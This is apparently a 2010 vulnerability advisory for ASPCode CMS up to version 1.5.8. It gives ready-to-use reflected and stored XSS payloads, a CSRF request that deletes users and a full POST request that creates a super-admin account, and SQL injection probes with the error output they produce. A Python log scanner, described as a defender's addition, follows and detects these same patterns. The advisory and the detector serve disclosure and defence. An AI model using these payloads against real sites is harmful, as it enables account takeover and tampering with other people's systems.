ASPCode CMS <= v1.5.8 [ Multiple Vulnerabilities ]

[+] [SOFTWARE] :: ASPCode CMS

[+] [SOFTWARE SITE] :: www.aspcodecms.com

[+] [VERSION] :: <= v1.5.8

[+] [DATE] :: 01 January 2010

[+] [AUTHOR] :: Alberto Fontanella (Fulgur Security)


[ 1 ] - [ Multiple XSS Vulnerabilities ]

http://[host]/default.asp?sec=1&ma1="><script>alert("XSS");</script>
http://[host]/default.asp?sec=1&tag="><script>alert("XSS");</script>
http://[host]/default.asp?sec=1&ma2="><script>alert("XSS");</script>

A reflected XSS also exists in the password-reset form: http://[host]/default.asp?sec=33&ma1=forgotpass . Put the XSS string in the Email field and submit it.

[ 2 ] - [ Persistent XSS ]

Post the following in the Guestbook section:

http://[host]/default.asp?sec=23

<img src="http://[host]/default.asp?sec=1&ma1="><script>alert("XSS");</script>"></img>

[ 3 ] - [ CSRF ]

To Delete a User Account

http://[host]/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=delete&idx=50

To Create a Super Admin Account

POST /default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=update&idx=-1 HTTP/1.1
Host: [host]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

username=HAXOR&password=PASSWD&old_password=&password_is_encrypted=false&email=HAXOR%40BLACKHAT.ORG&roleId=4&redirsectionid=0&confirmed=true

The CSRF can be chained with the XSS above (very dangerous).

[ 4 ] - [ Possible SQL Injection ]

http://[host]/default.asp?sec=64&ma1=tag&tag=CMS'

Output: Errore numero: -2147217900 Errore: Errore di sintassi (operatore mancante) nell'espressione della query '[ID] IN ()'.
Query: SELECT * FROM [section] s WHERE [ID] IN ()

http://[host]/default.asp?sec=1'

Output: Errore di run-time di Microsoft VBScript (0x800A000D) Tipo non corrispondente: 'sectionID' /include/api.asp, line 657
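Detection logic for the four issues above, run over constructed IIS W3C extended log lines. This is an added example for defenders, not code from the advisory or from ASPCode CMS; the trusted host name, the log field layout and the sample requests are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in IIS W3C extended format (not logs from a real ASPCode CMS host).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(Referer) sc-status
2010-01-01 10:00:00 GET /default.asp sec=1&ma1=news 10.0.0.5 http://cms.example/default.asp 200
2010-01-01 10:00:01 GET /default.asp sec=1&ma1=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 10.0.0.9 - 200
2010-01-01 10:00:02 GET /default.asp a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=delete&idx=50 10.0.0.9 http://evil.example/page.html 200
2010-01-01 10:00:03 POST /default.asp a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=update&idx=-1 10.0.0.9 - 200
2010-01-01 10:00:04 GET /default.asp sec=64&ma1=tag&tag=CMS%27 10.0.0.9 - 500
2010-01-01 10:00:05 POST /default.asp a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=update&idx=7 10.0.0.2 http://cms.example/default.asp 200
"""

XSS_PARAMS = {"ma1", "ma2", "tag"}   # parameters the advisory reports as reflected
SQLI_PARAMS = {"sec", "tag"}         # parameters the advisory shows breaking the SQL
XSS_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)

def scan_log(text, trusted_host):
    """Return (time, finding, detail) tuples for requests matching the advisory's patterns."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, time, method, stem, query, _ip, referer, status = line.split(" ")
        if stem.lower() != "/default.asp":
            continue
        params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
        # [1]/[2]: script markup in the parameters the advisory lists as reflected.
        for name in sorted(XSS_PARAMS.intersection(params)):
            if XSS_RE.search(params[name]):
                findings.append((time, "xss", name))
        # [3]: admin user-management action whose Referer is missing or off-site.
        if params.get("module") == "users" and params.get("ma2") in {"delete", "update"}:
            ref_host = urlsplit(referer).hostname if referer != "-" else None
            if ref_host != trusted_host:
                findings.append((time, "csrf-suspect", f"{method} ma2={params['ma2']} idx={params.get('idx')}"))
        # [4]: quote character in the parameters that produced the database errors.
        for name in sorted(SQLI_PARAMS.intersection(params)):
            if "'" in params[name]:
                findings.append((time, "sqli-probe", f"{name} status={status}"))
    return findings

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, "cms.example"):
        print(*hit)
```

The last sample line, an update request carrying a same-site Referer, produces no finding, so the CSRF check only flags cross-site or Referer-less admin actions.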

[ EOF ]